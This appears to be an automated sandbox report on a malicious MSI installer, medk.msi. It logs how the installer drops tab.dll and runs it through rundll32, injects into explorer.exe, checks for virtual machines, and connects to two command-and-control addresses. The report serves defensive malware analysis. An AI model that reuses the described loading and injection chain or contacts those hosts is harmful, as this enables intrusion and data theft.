            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB, AdditionalSemiUniqueID BLOB NOT NULL);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE CacheDbInfo(DbVersion INTEGER, UsingAdditionalSemiUniqueID INTEGER, LastMaintenanceTimestamp INTEGER);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: SELECT DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp FROM CacheDbInfo LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: INSERT INTO TempDb.MsgCacheRowsToDelete SELECT MsgRowid FROM MsgCache WHERE LastUsedTimestamp < ? OR LastUsedTimestamp > ? OR MsgPrefixID NOT IN (SELECT MsgPrefixID FROM MsgPrefix);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixData = ? LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgRowid = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE TempDb.MsgCacheRowsToDelete(MsgRowid INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: INSERT INTO MsgPrefix(MsgPrefixData, JustCreatedFlag) VALUES (?, ?);
            Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi"
            Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI8F42.tmp "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Section loaded: uxtheme.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Section loaded: sxs.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
            Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
            Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
            Source: C:\Windows\Installer\MSI8F42.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
            Source: medk.msi | Static file information: File size 2131456 > 1048576
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: tab.dll.2.dr | Static PE information: real checksum: 0x16c5c6 should be: 0x1a4b0f
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_0031323C push ecx; ret 4_2_0031324F
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800043FA push rbp; retf 6_2_00000001800043FB
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004437 push rbp; retf 6_2_0000000180004438
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000430A push rbp; retf 6_2_000000018000430B
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004326 push rbp; retf 6_2_0000000180004327

            Persistence and Installation Behavior

            Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSI8F42.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8DD8.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8F42.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8D3A.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8D89.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8E17.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\tab.dll
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,8_2_02E07274
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_02E08424
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,8_2_02E10610
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 584
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 8864
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 886
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 870
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI8DD8.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI8D3A.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI8D89.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI8E17.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\tab.dll
            Source: C:\Windows\System32\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-9410
            Source: C:\Windows\Installer\MSI8F42.tmp | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-33326
            Source: C:\Windows\Installer\MSI8F42.tmp | API coverage: 6.9 %
            Source: C:\Windows\System32\rundll32.exe | API coverage: 0.6 %
            Source: C:\Windows\explorer.exe TID: 5412 | Thread sleep count: 225 > 30
            Source: C:\Windows\explorer.exe TID: 5412 | Thread sleep time: -225000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1340 | Thread sleep count: 584 > 30
            Source: C:\Windows\explorer.exe TID: 1340 | Thread sleep time: -58400s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5412 | Thread sleep count: 8864 > 30
            Source: C:\Windows\explorer.exe TID: 5412 | Thread sleep time: -8864000s >= -30000s
            Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_0032AF79 FindFirstFileExW,4_2_0032AF79
            Source: C:\Windows\explorer.exe | Code function: 8_2_02E0A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,8_2_02E0A8E0
            Source: C:\Windows\explorer.exe | Code function: 8_2_02E02B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_02E02B28
            Source: rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW !
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
            Source: explorer.exe, 00000008.00000000.2238643975.00000000097F3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWws
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
            Source: explorer.exe, 00000008.00000002.4581549359.0000000009605000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
            Source: explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_002FD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_002FD0A5
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D65BC GetLastError,OutputDebugStringW,6_2_00000001800D65BC
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_0032AD78 mov eax, dword ptr fs:[00000030h] 4_2_0032AD78
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_00322DCC mov ecx, dword ptr fs:[00000030h] 4_2_00322DCC
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_002F2310 GetProcessHeap,4_2_002F2310
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI8F42.tmp "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_003133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_003133A8
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_0031353F SetUnhandledExceptionFilter,4_2_0031353F
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_00312968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00312968
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_00316E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00316E1B
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D50A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000001800D50A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800DBA64 VirtualAllocExNuma,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800DBA64

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\rundll32.exe | Network Connect: 87.120.37.120 9043
            Source: C:\Windows\System32\rundll32.exe | Network Connect: 45.143.166.230 9043
            Source: C:\Windows\System32\rundll32.exe | Memory allocated: C:\Windows\explorer.exe base: 2E00000 protect: page execute and read and write
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_00007DF4DD100100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF4DD100100
            Source: C:\Windows\System32\rundll32.exe | Thread created: C:\Windows\explorer.exe EIP: 2E00000
            Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 2E00000 value starts with: 4D5A
            Source: C:\Windows\System32\rundll32.exe | Memory written: PID: 4004 base: 2E00000 value: 4D
            Source: C:\Windows\System32\rundll32.exe | Thread register set: 3784 1
            Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 2E00000
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_002F52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_002F52F0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001510 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,6_2_0000000180001510
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2235166234.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4564271151.0000000000D68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000008.00000000.2238643975.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000098E3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_003135A9 cpuid 4_2_003135A9
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: EnumSystemLocalesW,4_2_0032E0C6
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: EnumSystemLocalesW,4_2_00327132
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: EnumSystemLocalesW,4_2_0032E111
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: EnumSystemLocalesW,4_2_0032E1AC
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0032E237
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoEx,4_2_003123F8
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoW,4_2_0032E48A
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0032E5B3
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoW,4_2_0032E6B9
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetLocaleInfoW,4_2_003276AF
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0032E788
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_0032DE24
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800FA4C8
            Source: C:\Windows\System32\rundll32.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00000001800FA160
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800FA598
            Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00000001800FA9D8
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800EFEA8
            Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,6_2_00000001800F0328
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00000001800FABBC
            Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_003137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_003137D5
            Source: C:\Windows\explorer.exe | Code function: 8_2_02E08D3C GetUserNameA,wsprintfA,8_2_02E08D3C
            Source: C:\Windows\Installer\MSI8F42.tmp | Code function: 4_2_00327B1F GetTimeZoneInformation,4_2_00327B1F
            Source: C:\Windows\explorer.exe | Code function: 8_2_02E100E8 RtlGetVersion,8_2_02E100E8

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3784, type: MEMORYSTR
            Source: Yara match | File source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3784, type: MEMORYSTR
            Source: Yara match, File source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
            Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
            Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 82 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; 121 Masquerading; 1 Virtualization/Sandbox Evasion; 82 Process Injection; 1 Rundll32; Dynamic API Resolution; Stripped Payloads
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
            Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 1 Account Discovery; 1 File and Directory Discovery; 34 System Information Discovery; 31 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
            Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
            Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
            Behavior Graph ID: 1555319, Sample: medk.msi, Startdate: 13/11/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            medk.msi | 3% | ReversingLabs

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\tab.dll | 3% | ReversingLabs
            C:\Windows\Installer\MSI8D3A.tmp | 0% | ReversingLabs
            C:\Windows\Installer\MSI8D89.tmp | 0% | ReversingLabs
